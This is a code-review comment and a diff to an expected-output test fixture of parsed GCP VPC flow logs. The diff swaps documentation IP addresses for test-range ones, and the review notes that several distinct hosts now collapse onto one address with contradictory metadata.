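Review bot: `67.43.156.13` in the `-5043` hunk now stands in for three different original hosts, so the fixture carries contradictory metadata for one address: here it is the `kibana` instance (`"domain": "kibana"`) with `"as": { "number": 15169 }`, while in the `-4654` and `-5241` hunks the same address is the external Broomfield client with `"as": { "number": 33652 }`. Collapsing `203.0.113.58`, `203.0.113.134` and `203.0.113.12` onto one value (and `198.51.100.248`/`198.51.100.107` onto `67.43.156.14`) also means `related.ip` and any per-host assertions no longer distinguish those flows, which weakens what this expected file actually checks. If the replacement addresses are constrained to an allow-list for the test GeoIP data (inferred, not visible here), mapping each original address to its own value inside that range, e.g. `67.43.156.15` for the kibana VM, preserves one-to-one host identity at no cost. Note too that these are globally routable addresses rather than the RFC 5737 documentation ranges they replace, so the input log should stay clearly marked as synthetic data.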
@@ -5113,8 +5113,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868599600Z", - "original": "{\"insertId\":\"1ulp77rfdvho5y\",\"jsonPayload\":{\"bytes_sent\":\"60335\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.538257098Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391432100Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5y\",\"jsonPayload\":{\"bytes_sent\":\"60335\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.538257098Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:58.492572765Z", "end": "2019-06-14T03:49:48.538257098Z", @@ -5135,10 +5135,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -5152,7 +5152,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jiDRQHDBdyhzib4qfhhB5Y0obik=", + "community_id": "1:if1o1IHC+FQXkxdlwDLZoOhwlFs=", "bytes": 65565, "name": "default", "transport": "tcp", @@ -5175,7 +5175,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -5211,8 +5211,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868603Z", - "original": "{\"insertId\":\"1ulp77rfdvho6a\",\"jsonPayload\":{\"bytes_sent\":\"65565\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"354\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391437100Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho6a\",\"jsonPayload\":{\"bytes_sent\":\"65565\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"354\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147072949Z", "end": "2019-06-14T03:49:59.565451051Z", @@ -5241,17 +5241,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65271, "bytes": 70174, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 717 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:32epFp/pi9XGVYf8FMJ7jpc0AzI=", + "community_id": "1:qv0hIE4qzHUK+++IYF3H4yaOdYA=", "bytes": 70174, "transport": "tcp", "type": "ipv4", @@ -5265,7 +5265,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -5290,8 +5290,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868606400Z", - "original": "{\"insertId\":\"1ulp77rfdvho4v\",\"jsonPayload\":{\"bytes_sent\":\"70174\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65271},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"717\",\"reporter\":\"DEST\",\"rtt_msec\":\"89\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391441700Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho4v\",\"jsonPayload\":{\"bytes_sent\":\"70174\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65271},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"717\",\"reporter\":\"DEST\",\"rtt_msec\":\"89\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.155378070Z", "end": "2019-06-14T03:49:55.318940798Z", @@ -5318,17 +5318,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 34178, "bytes": 1461, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:bh7TlqiDrY8ste65CJNAKtfwOT0=", + "community_id": "1:ZAwMkhzg8iPFTne4VZtPZ10WSQw=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -5342,7 +5342,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -5367,8 +5367,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868609500Z", - "original": "{\"insertId\":\"bnj3cofh3cdk1\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":34178},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391445500Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk1\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34178},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:46:51.237256499Z", "end": "2019-06-14T03:46:51.355687385Z", @@ -5395,17 +5395,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33602, "bytes": 1460, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:+QA68gzvBX6Rs13KKi5Sm666UiU=", + "community_id": "1:Gt7dopsBY+UOS/rgstf7QtnWxMI=", "bytes": 1460, "transport": "tcp", "type": "ipv4", @@ -5419,7 +5419,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -5444,8 +5444,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868612600Z", - "original": "{\"insertId\":\"bnj3cofh3cdjx\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":33602},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391450100Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdjx\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33602},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:45:50.954948790Z", "end": "2019-06-14T03:45:51.090104692Z", @@ -5472,18 +5472,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33554, "bytes": 66736, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 366 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:BbRNTmVcGaqf/baRzluKDpJAprQ=", + "community_id": "1:8vM4z84sXvUT94gexJfa2ZSNZ/c=", "bytes": 66736, "name": "default", "transport": "tcp", @@ -5505,7 +5505,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -5542,8 +5542,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868615700Z", - "original": "{\"insertId\":\"bnj3cofh3cdju\",\"jsonPayload\":{\"bytes_sent\":\"66736\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"366\",\"reporter\":\"DEST\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391454100Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdju\",\"jsonPayload\":{\"bytes_sent\":\"66736\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"366\",\"reporter\":\"DEST\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143837873Z", "end": "2019-06-14T03:49:59.565131125Z", @@ -5564,9 +5564,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33602, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -5580,7 +5580,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+QA68gzvBX6Rs13KKi5Sm666UiU=", + "community_id": "1:Gt7dopsBY+UOS/rgstf7QtnWxMI=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -5595,7 +5595,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
@@ -5619,8 +5619,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868620Z", - "original": "{\"insertId\":\"bnj3cofh3cdjz\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":33602,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391458200Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdjz\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33602,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:45:50.954948790Z", "end": "2019-06-14T03:45:51.090104692Z", @@ -5647,17 +5647,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 52454, "bytes": 1464, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:x8E1sBwJRB/brRn7+TWuuDv6Seg=", + "community_id": "1:WoYlUsEVcZcFfg615Q+r2a53t50=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -5671,7 +5671,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -5696,8 +5696,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868623Z", - "original": "{\"insertId\":\"bnj3cofh3cdkk\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":52454},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391462100Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkk\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52454},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:40.779893091Z", "end": "2019-06-14T03:42:40.888804332Z", @@ -5724,18 +5724,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 259510, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 251 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:kmlKCdqw/+vcFaSeBx9hVkJjnAE=", + "community_id": "1:C7B7lD6dSCm1Xnh0Cv/Rl2jt7CY=", "bytes": 259510, "name": "default", "transport": "tcp", @@ -5757,7 +5757,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
